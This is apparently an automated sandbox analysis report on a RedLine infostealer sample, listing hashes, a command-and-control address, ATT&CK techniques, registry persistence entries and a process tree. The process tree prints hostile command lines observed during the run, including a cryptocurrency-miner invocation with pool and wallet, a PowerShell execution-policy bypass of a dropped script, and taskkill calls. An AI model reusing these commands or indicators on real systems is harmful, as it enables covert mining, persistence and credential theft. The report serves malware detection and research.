redline | 914cd602a58f69dd35dd207d8128807926a139f27f4d8b7b2b958041783bc10c

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-en-20211208
submitted
01-02-2022 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b81f2f2d3c122a53a0c99f0b21e0ff79.exe
Size

6.9MB
MD5

b81f2f2d3c122a53a0c99f0b21e0ff79
SHA1

9b7e2b6b3464b5130f05b10f170e07fc8356ad2e
SHA256

914cd602a58f69dd35dd207d8128807926a139f27f4d8b7b2b958041783bc10c
SHA512

51ca133984ade0dbf6d926185a948c13f421da2dbe23b51bb2df22fd3c4c153de593e993b497f97ea18ae9e4060a14a3cdb537c27bc2922483235d2563402c76

Score

10^/10

redline discovery evasion infostealer persistence spyware stealer themida trojan upx

Malware Config

Extracted

Family

redline

91.243.59.131:7171

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1668-105-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline
behavioral1/memory/1668-104-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline
behavioral1/memory/1668-106-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline
behavioral1/memory/1668-108-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

steal.exe123.exeRegHost.exeWindowsDefender.exeRegHost.exeRegHost.exeRegHost.exe

pid process

472 steal.exe
672 123.exe
1876 RegHost.exe
1132 WindowsDefender.exe
564 RegHost.exe
1580 RegHost.exe
564 RegHost.exe

pid	process
472	steal.exe
672	123.exe
1876	RegHost.exe
1132	WindowsDefender.exe
564	RegHost.exe
1580	RegHost.exe
564	RegHost.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1272-71-0x0000000140000000-0x000000014274C000-memory.dmp	upx
behavioral1/memory/1272-72-0x0000000140000000-0x000000014274C000-memory.dmp	upx
behavioral1/memory/1272-73-0x0000000140000000-0x000000014274C000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\WindowsDefender.exe	upx
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe	upx

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegHost.exeRegHost.exeRegHost.exe123.exeRegHost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	123.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	123.exe

Loads dropped DLL 15 IoCs

Processes:

b81f2f2d3c122a53a0c99f0b21e0ff79.exeexplorer.exeRegAsm.exeexplorer.exeexplorer.exepowershell.exeexplorer.exe

pid	process
1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe
1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe
1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe
1356
1076	explorer.exe
1076	explorer.exe
1668	RegAsm.exe
1300	explorer.exe
768	explorer.exe
1364	powershell.exe
1404
1404
1404
1404
1712	explorer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 28 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\123.exe	themida
\Users\Admin\AppData\Local\Temp\123.exe	themida
\Users\Admin\AppData\Local\Temp\123.exe	themida
\Users\Admin\AppData\Local\Temp\123.exe	themida
behavioral1/memory/672-65-0x000000013FC80000-0x0000000140584000-memory.dmp	themida
behavioral1/memory/672-66-0x000000013FC80000-0x0000000140584000-memory.dmp	themida
behavioral1/memory/672-67-0x000000013FC80000-0x0000000140584000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\123.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/1876-89-0x000000013F900000-0x0000000140204000-memory.dmp	themida
behavioral1/memory/1876-90-0x000000013F900000-0x0000000140204000-memory.dmp	themida
behavioral1/memory/1876-91-0x000000013F900000-0x0000000140204000-memory.dmp	themida
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/564-120-0x000000013F160000-0x000000013FA64000-memory.dmp	themida
behavioral1/memory/564-121-0x000000013F160000-0x000000013FA64000-memory.dmp	themida
behavioral1/memory/564-123-0x000000013F160000-0x000000013FA64000-memory.dmp	themida
behavioral1/memory/1364-138-0x00000000025B0000-0x00000000031FA000-memory.dmp	themida
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/1580-143-0x000000013FA20000-0x0000000140324000-memory.dmp	themida
behavioral1/memory/1580-144-0x000000013FA20000-0x0000000140324000-memory.dmp	themida
behavioral1/memory/1580-145-0x000000013FA20000-0x0000000140324000-memory.dmp	themida
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

123.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	123.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exe123.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	123.exe

Suspicious use of SetThreadContext 10 IoCs

Processes:

123.exeRegHost.exesteal.exeRegHost.exeRegHost.exeRegHost.exe

description	pid	process	target process
PID 672 set thread context of 1272	672	123.exe	bfsvc.exe
PID 672 set thread context of 1076	672	123.exe	explorer.exe
PID 1876 set thread context of 992	1876	RegHost.exe	bfsvc.exe
PID 472 set thread context of 1668	472	steal.exe	RegAsm.exe
PID 1876 set thread context of 1300	1876	RegHost.exe	explorer.exe
PID 564 set thread context of 816	564	RegHost.exe	bfsvc.exe
PID 564 set thread context of 768	564	RegHost.exe	explorer.exe
PID 1580 set thread context of 1648	1580	RegHost.exe	bfsvc.exe
PID 1580 set thread context of 1712	1580	RegHost.exe	explorer.exe
PID 564 set thread context of 1892	564	RegHost.exe	bfsvc.exe

Drops file in Program Files directory 1 IoCs

Processes:

WindowsDefender.exe

description ioc process

File created C:\Program Files\Google\Chrome\Application\launcher.exe WindowsDefender.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Program Files\Google\Chrome\Application\launcher.exe	WindowsDefender.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1924 taskkill.exe
1700 taskkill.exe
948 taskkill.exe

pid	process
1924	taskkill.exe
1700	taskkill.exe
948	taskkill.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

Processes:

explorer.exeRegAsm.exeexplorer.exeexplorer.exepowershell.exeexplorer.exe

pid	process
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1076	explorer.exe
1668	RegAsm.exe
1668	RegAsm.exe
1668	RegAsm.exe
1668	RegAsm.exe
1668	RegAsm.exe
1300	explorer.exe
1300	explorer.exe
1300	explorer.exe
1300	explorer.exe
1300	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
1364	powershell.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
768	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

RegAsm.exetaskkill.exepowershell.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1668	RegAsm.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1700	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b81f2f2d3c122a53a0c99f0b21e0ff79.exe123.exeexplorer.exeRegHost.exesteal.exe

description	pid	process	target process
PID 1260 wrote to memory of 472	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 1260 wrote to memory of 472	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 1260 wrote to memory of 472	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 1260 wrote to memory of 472	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 1260 wrote to memory of 672	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	123.exe
PID 1260 wrote to memory of 672	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	123.exe
PID 1260 wrote to memory of 672	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	123.exe
PID 1260 wrote to memory of 672	1260	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	123.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1272	672	123.exe	bfsvc.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 672 wrote to memory of 1076	672	123.exe	explorer.exe
PID 1076 wrote to memory of 1876	1076	explorer.exe	RegHost.exe
PID 1076 wrote to memory of 1876	1076	explorer.exe	RegHost.exe
PID 1076 wrote to memory of 1876	1076	explorer.exe	RegHost.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 992	1876	RegHost.exe	bfsvc.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 1876 wrote to memory of 1300	1876	RegHost.exe	explorer.exe
PID 472 wrote to memory of 1668	472	steal.exe	RegAsm.exe
PID 472 wrote to memory of 1668	472	steal.exe	RegAsm.exe
PID 472 wrote to memory of 1668	472	steal.exe	RegAsm.exe
PID 472 wrote to memory of 1668	472	steal.exe	RegAsm.exe
PID 472 wrote to memory of 1668	472	steal.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe
"C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1260

C:\Users\Admin\AppData\Local\Temp\steal.exe
C:\Users\Admin\AppData\Local\Temp\steal.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM chrome.exe
5⤵
PID:1928

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -noexit -ExecutionPolicy Bypass -File C:\Users\Default\AppData\Local\Temp\upd.ps1
5⤵
PID:1728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -noexit -ExecutionPolicy Bypass -File C:\Users\Default\AppData\Local\Temp\upd.ps1
6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /IM powershell.exe
5⤵
PID:368

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM powershell.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /IM cmd.exe
5⤵
PID:1116

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM cmd.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Users\Admin\AppData\Local\Temp\123.exe
C:\Users\Admin\AppData\Local\Temp\123.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
3⤵
PID:1272

C:\Windows\explorer.exe
C:\Windows\explorer.exe "qwe1" "Standard%20VGA%20Graphics%20Adapter" "ga" "etc"
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1076

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
5⤵
PID:992

C:\Windows\explorer.exe
C:\Windows\explorer.exe "qwe1" "Standard%20VGA%20Graphics%20Adapter" "ga" "etc"
5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1300

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:564

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
7⤵
PID:816

C:\Windows\explorer.exe
C:\Windows\explorer.exe "qwe1" "Standard%20VGA%20Graphics%20Adapter" "ga" "etc"
7⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:768

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1580

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
9⤵
PID:1648

C:\Windows\explorer.exe
C:\Windows\explorer.exe "qwe1" "Standard%20VGA%20Graphics%20Adapter" "ga" "etc"
9⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1712

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:564

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
11⤵
PID:1892

C:\Windows\explorer.exe
C:\Windows\explorer.exe "qwe1" "Standard%20VGA%20Graphics%20Adapter" "ga" "etc"
11⤵
PID:1056

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\launcher.exe
MD5
b555ce6924de8b22121d29a6a153d3fa

SHA1
49e5a197e7e4e5bded33820a55ab664c370c9794

SHA256
0c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19

SHA512
1109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
MD5
2536bc6692a942d2e87f45877aa1f54e

SHA1
c5a910052ce3facd0fc2d4b8725f88c8a86687b6

SHA256
e0551a15e4da35e27732aaad3c9b2a80f82c020067d1e5c7c3de9c91abe62fa0

SHA512
e705606e9bcc6efa79718798d5451131229577b2a7bdc2f18792cd8d388e286fcdda10c461ff2d1cd71759042828e0b5bda0b8cbdd8e68622534e9aff2bd83ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\steal.exe
MD5
231147ca2fbb27db182411c726d9489e

SHA1
540fac37b19f2361973f3771a9ce4453dd1d370f

SHA256
9bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28

SHA512
a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691

Download Submit
C:\Users\Admin\AppData\Local\Temp\steal.exe
MD5
231147ca2fbb27db182411c726d9489e

SHA1
540fac37b19f2361973f3771a9ce4453dd1d370f

SHA256
9bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28

SHA512
a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Default\AppData\Local\Temp\upd.ps1
MD5
d1c27dd8b4ff0b91cb1b912bf9479c4d

SHA1
f1d6f19e9d938dd3b6a201f98ed8c76bd5c2fef7

SHA256
62d6a28d2df837f8fdec3057178c2aa17336969008832a77602f6771561fe605

SHA512
e2b164601307345c5f8eac1cbf70c8ed8919e4745fb2a79700729e211d84ae9ae8ee51139c8aadfe6dbc994e13310ab5ef20a4d02b3f9d68d51d65a63e32b3ae

Download Submit
\Program Files\Google\Chrome\Application\launcher.exe
MD5
b555ce6924de8b22121d29a6a153d3fa

SHA1
49e5a197e7e4e5bded33820a55ab664c370c9794

SHA256
0c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19

SHA512
1109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0

Download Submit
\Program Files\Google\Chrome\Application\launcher.exe
MD5
b555ce6924de8b22121d29a6a153d3fa

SHA1
49e5a197e7e4e5bded33820a55ab664c370c9794

SHA256
0c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19

SHA512
